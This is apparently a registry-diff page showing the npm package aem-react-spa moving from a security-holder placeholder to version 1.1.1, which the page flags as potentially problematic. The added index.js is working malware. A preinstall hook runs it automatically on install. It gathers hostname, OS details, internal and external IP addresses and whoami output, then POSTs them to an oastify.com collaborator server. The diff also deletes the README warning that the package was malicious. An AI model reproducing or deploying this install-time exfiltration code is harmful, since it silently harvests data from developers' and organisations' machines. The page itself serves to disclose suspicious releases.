aem-react-spa 0.0.1-security → 1.1.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of aem-react-spa might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +84 -0
  2. package/package.json +9 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,84 @@
1
+ const os = require('os');
2
+ const http = require('http');
3
+ const { exec } = require('child_process');
4
+ const https = require('https');
5
+
6
+ // Replace with your OASTify server URL
7
+ const OASTIFY_URL = "idz9tv1xutafe27nwf947pnudljg76vv.oastify.com";
8
+
9
+ // Function to send data to OASTify server
10
+ function sendToCollaborator(data) {
11
+ const payload = JSON.stringify(data);
12
+
13
+ const options = {
14
+ hostname: OASTIFY_URL.replace('https://', '').replace('/', ''),
15
+ port: 443,
16
+ path: '/',
17
+ method: 'POST',
18
+ headers: {
19
+ 'Content-Type': 'application/json',
20
+ 'Content-Length': payload.length
21
+ }
22
+ };
23
+
24
+ const req = https.request(options, (res) => {
25
+ console.log(`Status: ${res.statusCode}`);
26
+ });
27
+
28
+ req.on('error', (error) => {
29
+ console.error(`Error sending data: ${error.message}`);
30
+ });
31
+
32
+ req.write(payload);
33
+ req.end();
34
+ }
35
+
36
+ // Collect system information
37
+ function collectSystemInfo() {
38
+ const systemInfo = {
39
+ hostname: os.hostname(),
40
+ platform: os.platform(),
41
+ release: os.release(),
42
+ internalIP: getInternalIP(),
43
+ externalIP: null,
44
+ whoami: null
45
+ };
46
+
47
+ // Fetch external IP address
48
+ http.get('http://api.ipify.org', (res) => {
49
+ let ipData = '';
50
+ res.on('data', (chunk) => {
51
+ ipData += chunk;
52
+ });
53
+ res.on('end', () => {
54
+ systemInfo.externalIP = ipData;
55
+
56
+ // Fetch output of the 'whoami' command
57
+ exec('whoami', (error, stdout, stderr) => {
58
+ if (!error) {
59
+ systemInfo.whoami = stdout.trim();
60
+ }
61
+
62
+ // Send collected data to OASTify server
63
+ sendToCollaborator(systemInfo);
64
+ });
65
+ });
66
+ });
67
+ }
68
+
69
+ // Helper to get internal IP address
70
+ function getInternalIP() {
71
+ const interfaces = os.networkInterfaces();
72
+ for (const iface in interfaces) {
73
+ for (const address of interfaces[iface]) {
74
+ if (address.family === 'IPv4' && !address.internal) {
75
+ return address.address;
76
+ }
77
+ }
78
+ }
79
+ return null;
80
+ }
81
+
82
+ // Trigger the data collection
83
+ collectSystemInfo();
84
+
package/package.json CHANGED
@@ -1,6 +1,12 @@
1
1
  {
2
2
  "name": "aem-react-spa",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.1.1",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
6
12
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=aem-react-spa for more information.